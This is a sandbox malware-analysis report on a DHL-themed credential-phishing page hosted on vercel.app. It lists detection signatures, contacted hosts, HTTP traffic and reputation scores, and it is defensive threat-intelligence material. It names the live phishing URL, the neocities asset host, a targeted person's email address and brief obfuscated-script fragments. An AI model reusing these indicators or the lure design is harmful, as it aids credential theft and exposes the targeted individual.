Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://jd-amber.vercel.app/#helco2024152@hdel.co.kr

Overview

General Information

Sample URL:https://jd-amber.vercel.app/#helco2024152@hdel.co.kr
Analysis ID:1469966
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
HTML page contains obfuscated javascript
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 4052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2220,i,4837317040254672511,15702129655895526874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jd-amber.vercel.app/#helco2024152@hdel.co.kr" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

      Phishing

      barindex
      Source: https://jd-amber.vercel.appLLM: Score: 9 brands: DHL Reasons: The URL 'https://jd-amber.vercel.app' does not match the legitimate domain 'dhl.com' associated with DHL. The site prominently displays a login form requesting email credentials, which is a common phishing tactic. The text 'Login with your gmail credentials to view tracking information' is highly suspicious as legitimate DHL services would not ask for Gmail credentials. Additionally, the domain 'vercel.app' is not associated with DHL, and the email domain 'hdel.co.kr' is also suspicious. The combination of these factors strongly indicates that this is a phishing site. DOM: 0.0.pages.csv
      Source: https://jd-amber.vercel.appLLM: Score: 9 brands: DHL Reasons: The URL 'https://jd-amber.vercel.app' does not match the legitimate domain 'dhl.com' associated with DHL. The page prominently displays a login form requesting email and password, which is a common phishing technique. The message 'Login with your Gmail credentials to view tracking information' is another red flag, as it is unusual for DHL to request Gmail credentials. The domain 'vercel.app' is not associated with DHL, making it highly suspicious. The combination of these factors strongly indicates that this is a phishing site. DOM: 1.1.pages.csv
      Source: Yara matchFile source: 1.1.pages.csv, type: HTML
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: document.write(unescape('%3Chtml%20lang%3D%22en%22%3E%3Chead%3E%0A%0A%3Chead%3E%0A%20%20%20%20%3Cmet
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: var _0x3bff6e=_0x3502;function _0x3502(_0x4f8a55,_0x568e95){var _0x2c993a=_0x2c99();return _0x3502=f
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krMatcher: Found strong image similarity, brand: DHL
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krMatcher: Template: dhl matched
      Source: https://jd-amber.vercel.app/#emailMatcher: Template: dhl matched
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: Number of links: 0
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: Title: DHL | Tracking System does not match URL
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krSample URL: PII: helco2024152@hdel.co.kr
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: <input type="password" .../> found
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: No <meta name="author".. found
      Source: https://jd-amber.vercel.app/#helco2024152@hdel.co.krHTTP Parser: No <meta name="copyright".. found
      Source: chrome.exeMemory has grown: Private usage: 1MB later: 34MB
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
      Source: unknownUDP traffic detected without corresponding DNS query: 40.119.148.38
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: jd-amber.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://jd-amber.vercel.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://jd-amber.vercel.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://jd-amber.vercel.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.css HTTP/1.1Host: asfasfasfasp.neocities.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dh-style.css HTTP/1.1Host: asfasfasfasp.neocities.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Host: asfasfasfasp.neocities.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /mydhl-plus.svg HTTP/1.1Host: asfasfasfasp.neocities.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /mydhl-plus.svg HTTP/1.1Host: asfasfasfasp.neocities.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Host: asfasfasfasp.neocities.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico HTTP/1.1Host: cdn.glitch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico HTTP/1.1Host: cdn.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jd-amber.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico HTTP/1.1Host: cdn.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: jd-amber.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "24c5e3908ab5a78f2209cc7da1a0608a"
      Source: global trafficDNS traffic detected: DNS query: jd-amber.vercel.app
      Source: global trafficDNS traffic detected: DNS query: asfasfasfasp.neocities.org
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn.glitch.com
      Source: global trafficDNS traffic detected: DNS query: cdn.glitch.me
      Source: chromecache_72.7.drString found in binary or memory: http://opensource.org/licenses/MIT).
      Source: chromecache_74.7.drString found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKcQ72j00.woff2)
      Source: chromecache_74.7.drString found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKcg72j00.woff2)
      Source: chromecache_74.7.drString found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKcw72j00.woff2)
      Source: chromecache_74.7.drString found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKew72j00.woff2)
      Source: chromecache_74.7.drString found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfA72j00.woff2)
      Source: chromecache_74.7.drString found in binary or memory: https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2)
      Source: chromecache_73.7.dr, chromecache_61.7.drString found in binary or memory: https://getbootstrap.com)
      Source: chromecache_73.7.dr, chromecache_61.7.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_73.7.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_66.7.drString found in binary or memory: https://www.html-code-generator.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: classification engineClassification label: mal76.phis.win@17/29@20/11
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2220,i,4837317040254672511,15702129655895526874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jd-amber.vercel.app/#helco2024152@hdel.co.kr"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2220,i,4837317040254672511,15702129655895526874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Extra Window Memory Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://jd-amber.vercel.app/#helco2024152@hdel.co.kr0%Avira URL Cloudsafe
      https://jd-amber.vercel.app/#helco2024152@hdel.co.kr100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://opensource.org/licenses/MIT).0%URL Reputationsafe
      https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
      https://getbootstrap.com)0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js0%Avira URL Cloudsafe
      https://www.html-code-generator.com0%Avira URL Cloudsafe
      https://cdn.glitch.com/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico0%Avira URL Cloudsafe
      https://jd-amber.vercel.app/0%Avira URL Cloudsafe
      https://code.jquery.com/jquery-3.2.1.slim.min.js0%Avira URL Cloudsafe
      https://cdn.glitch.com/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico4%VirustotalBrowse
      https://cdn.glitch.me/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico0%Avira URL Cloudsafe
      https://www.html-code-generator.com0%VirustotalBrowse
      https://github.com/twbs/bootstrap/graphs/contributors)0%VirustotalBrowse
      https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js0%VirustotalBrowse
      https://asfasfasfasp.neocities.org/dh-style.css0%Avira URL Cloudsafe
      https://code.jquery.com/jquery-3.2.1.slim.min.js1%VirustotalBrowse
      https://asfasfasfasp.neocities.org/bootstrap.min.css0%Avira URL Cloudsafe
      https://asfasfasfasp.neocities.org/mydhl-plus.svg0%Avira URL Cloudsafe
      https://cdn.glitch.me/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.ico0%VirustotalBrowse
      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js0%Avira URL Cloudsafe
      https://asfasfasfasp.neocities.org/logo.png0%Avira URL Cloudsafe
      https://github.com/twbs/bootstrap/blob/master/LICENSE)0%VirustotalBrowse
      https://asfasfasfasp.neocities.org/bootstrap.min.css0%VirustotalBrowse
      https://asfasfasfasp.neocities.org/dh-style.css0%VirustotalBrowse
      https://asfasfasfasp.neocities.org/logo.png0%VirustotalBrowse
      https://asfasfasfasp.neocities.org/mydhl-plus.svg0%VirustotalBrowse
      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      asfasfasfasp.neocities.org
      198.51.233.2
      truefalse
        unknown
        cdn.glitch.me
        18.66.102.46
        truefalse
          unknown
          cdn.glitch.com
          99.86.4.12
          truefalse
            unknown
            code.jquery.com
            151.101.66.137
            truefalse
              unknown
              jd-amber.vercel.app
              76.76.21.93
              truetrue
                unknown
                cdnjs.cloudflare.com
                104.17.25.14
                truefalse
                  unknown
                  maxcdn.bootstrapcdn.com
                  104.18.11.207
                  truefalse
                    unknown
                    www.google.com
                    142.250.185.132
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://jd-amber.vercel.app/#emailtrue
                        unknown
                        https://cdn.glitch.com/e32f5f11-67a9-4841-b22d-bc1db5ba585a%2Ffavicon_dhl.icofalse
                        • 4%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
